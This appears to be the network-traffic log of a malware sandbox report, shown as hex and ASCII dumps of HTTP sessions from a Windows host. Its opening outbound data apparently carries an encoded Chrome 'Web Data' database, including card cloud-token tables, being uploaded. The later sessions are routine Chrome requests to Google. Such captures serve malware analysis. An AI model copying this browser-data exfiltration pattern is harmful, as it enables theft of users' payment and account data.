                                                                                            2025-03-13 13:50:07 UTC16355OUTData Raw: 66 64 47 56 34 64 43 42 57 51 56 4a 44 53 45 46 53 4c 43 42 31 63 32 46 6e 5a 56 39 70 62 6e 4e 30 63 6e 56 6a 64 47 6c 76 62 6e 4e 66 64 47 56 34 64 43 42 57 51 56 4a 44 53 45 46 53 4b 59 46 30 47 41 63 58 52 55 55 42 67 6d 74 30 59 57 4a 73 5a 58 4e 6c 63 6e 5a 6c 63 6c 39 6a 59 58 4a 6b 58 32 4e 73 62 33 56 6b 58 33 52 76 61 32 56 75 58 32 52 68 64 47 46 7a 5a 58 4a 32 5a 58 4a 66 59 32 46 79 5a 46 39 6a 62 47 39 31 5a 46 39 30 62 32 74 6c 62 6c 39 6b 59 58 52 68 48 45 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 5a 58 4a 32 5a 58 4a 66 59 32 46 79 5a 46 39 6a 62 47 39 31 5a 46 39 30 62 32 74 6c 62 6c 39 6b 59 58 52 68 49 43 68 70 5a 43 42 57 51 56 4a 44 53 45 46 53 4c 43 42 7a 64 57 5a 6d 61 58 67 67 56 6b 46 53 51 30 68 42 55 69 77 67 5a 58
                                                                                            Data Ascii: fdGV4dCBWQVJDSEFSLCB1c2FnZV9pbnN0cnVjdGlvbnNfdGV4dCBWQVJDSEFSKYF0GAcXRUUBgmt0YWJsZXNlcnZlcl9jYXJkX2Nsb3VkX3Rva2VuX2RhdGFzZXJ2ZXJfY2FyZF9jbG91ZF90b2tlbl9kYXRhHENSRUFURSBUQUJMRSBzZXJ2ZXJfY2FyZF9jbG91ZF90b2tlbl9kYXRhIChpZCBWQVJDSEFSLCBzdWZmaXggVkFSQ0hBUiwgZX
                                                                                            2025-03-13 13:50:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                            2025-03-13 13:50:09 UTC158INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 13 Mar 2025 13:50:09 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            11192.168.2.449751216.58.206.364435228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:11 UTC601OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1
                                                                                            Host: www.google.com
                                                                                            Connection: keep-alive
                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJahywEInP7MAQiFoM0BCMnRzgEIvtXOAQiB1s4BCMjczgEIiuDOAQiu5M4BCIvlzgE=
                                                                                            Sec-Fetch-Site: none
                                                                                            Sec-Fetch-Mode: no-cors
                                                                                            Sec-Fetch-Dest: empty
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                            Accept-Encoding: gzip, deflate, br, zstd
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            2025-03-13 13:50:12 UTC1303INHTTP/1.1 200 OK
                                                                                            Date: Thu, 13 Mar 2025 13:50:11 GMT
                                                                                            Pragma: no-cache
                                                                                            Expires: -1
                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-4V5hFcIkRD5Ar9xeOpFsQQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                            Accept-CH: Downlink
                                                                                            Accept-CH: RTT
                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                            Permissions-Policy: unload=()
                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                            Server: gws
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Accept-Ranges: none
                                                                                            Vary: Accept-Encoding
                                                                                            Connection: close
                                                                                            Transfer-Encoding: chunked
                                                                                            2025-03-13 13:50:12 UTC75INData Raw: 33 36 30 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 72 61 69 6e 62 6f 77 20 73 69 78 20 73 69 65 67 65 20 78 22 2c 22 70 6c 61 79 62 6f 69 20 63 61 72 74 69 20 61 6c 62 75 6d 20 72 65 6c 65 61 73 65 20 64 61 74 65 22 2c 22 62 6c
                                                                                            Data Ascii: 360)]}'["",["rainbow six siege x","playboi carti album release date","bl
                                                                                            2025-03-13 13:50:12 UTC796INData Raw: 6f 6f 64 20 6d 6f 6f 6e 20 74 6f 74 61 6c 20 6c 75 6e 61 72 20 65 63 6c 69 70 73 65 22 2c 22 6e 65 77 20 79 6f 72 6b 20 67 69 61 6e 74 73 20 73 74 6f 6e 65 20 66 6f 72 73 79 74 68 65 22 2c 22 62 69 6c 6c 79 20 66 6c 79 6e 6e 22 2c 22 67 6f 6f 67 6c 65 20 63 68 72 6f 6d 65 63 61 73 74 20 61 75 64 69 6f 22 2c 22 6e 66 6c 20 6d 6f 63 6b 20 64 72 61 66 74 20 32 30 32 35 20 73 74 65 65 6c 65 72 73 22 2c 22 6c 69 70 20 62 75 20 74 61 6e 20 69 6e 74 65 6c 20 63 65 6f 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22
                                                                                            Data Ascii: ood moon total lunar eclipse","new york giants stone forsythe","billy flynn","google chromecast audio","nfl mock draft 2025 steelers","lip bu tan intel ceo"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"
                                                                                            2025-03-13 13:50:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            12192.168.2.449752216.58.206.364435228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:11 UTC359OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                            Host: www.google.com
                                                                                            Connection: keep-alive
                                                                                            Sec-Fetch-Site: none
                                                                                            Sec-Fetch-Mode: no-cors
                                                                                            Sec-Fetch-Dest: empty
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                            Accept-Encoding: gzip, deflate, br, zstd
                                                                                            Accept-Language: en-US,en;q=0.9


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            13192.168.2.449750216.58.206.364435228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-03-13 13:50:11 UTC504OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                            Host: www.google.com
                                                                                            Connection: keep-alive
                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJahywEInP7MAQiFoM0BCMnRzgEIvtXOAQiB1s4BCMjczgEIiuDOAQiu5M4BCIvlzgE=
                                                                                            Sec-Fetch-Site: cross-site
                                                                                            Sec-Fetch-Mode: no-cors
                                                                                            Sec-Fetch-Dest: empty
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                            Accept-Encoding: gzip, deflate, br, zstd
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            2025-03-13 13:50:11 UTC1055INHTTP/1.1 200 OK
                                                                                            Version: 734020781
                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                            Accept-CH: Downlink
                                                                                            Accept-CH: RTT
                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                            Permissions-Policy: unload=()
                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                            Date: Thu, 13 Mar 2025 13:50:11 GMT
                                                                                            Server: gws
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Accept-Ranges: none
                                                                                            Vary: Accept-Encoding
                                                                                            Connection: close
                                                                                            Transfer-Encoding: chunked
                                                                                            2025-03-13 13:50:11 UTC323INData Raw: 32 33 36 34 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 46 61 20 67 62 5f 32 64 20 67 62 5f 50 65 20 67 62 5f 72 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                            Data Ascii: 2364)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_2d gb_Pe gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                            2025-03-13 13:50:11 UTC1378INData Raw: 5c 75 30 30 33 64 5c 22 67 62 5f 6c 64 20 67 62 5f 70 64 20 67 62 5f 48 64 20 67 62 5f 6d 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 78 64 20 67 62 5f 73 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4b 63 20 67 62 5f 52 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c
                                                                                            Data Ascii: \u003d\"gb_ld gb_pd gb_Hd gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\
                                                                                            2025-03-13 13:50:11 UTC1378INData Raw: 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 78 64 20 67 62 5f 39 63 20 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 76 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 62 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76
                                                                                            Data Ascii: span\u003e\u003c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_xd gb_9c gb_ad\"\u003e\u003cspan class\u003d\"gb_vd\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_bd\"\u003e \u003c\/div
                                                                                            2025-03-13 13:50:11 UTC1378INData Raw: 30 30 33 64 5c 22 5f 74 6f 70 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32
                                                                                            Data Ascii: 003d\"_top\" role\u003d\"button\" tabindex\u003d\"0\"\u003e \u003csvg class\u003d\"gb_E\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-2
                                                                                            2025-03-13 13:50:11 UTC1378INData Raw: 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 36 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c
                                                                                            Data Ascii: -2,2 0.9,2 2,2zM6,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,
                                                                                            2025-03-13 13:50:11 UTC1378INData Raw: 2d 6c 61 62 65 6c 30 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 36 36 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f
                                                                                            Data Ascii: -label0","left_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700266,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_
                                                                                            2025-03-13 13:50:11 UTC1378INData Raw: 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 5c 6e 2a 2f 5c 6e 76 61 72 20 41 64 3b 5f 2e 79 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 61 2e 6c 65 6e 67 74 68 3b 69 66 28 62 5c 75 30 30 33 65 30 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 41 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 7a 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65
                                                                                            Data Ascii: fier: Apache-2.0\n*/\nvar Ad;_.yd\u003dfunction(a){const b\u003da.length;if(b\u003e0){const c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Ad\u003dfunction(a){return new _.zd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase
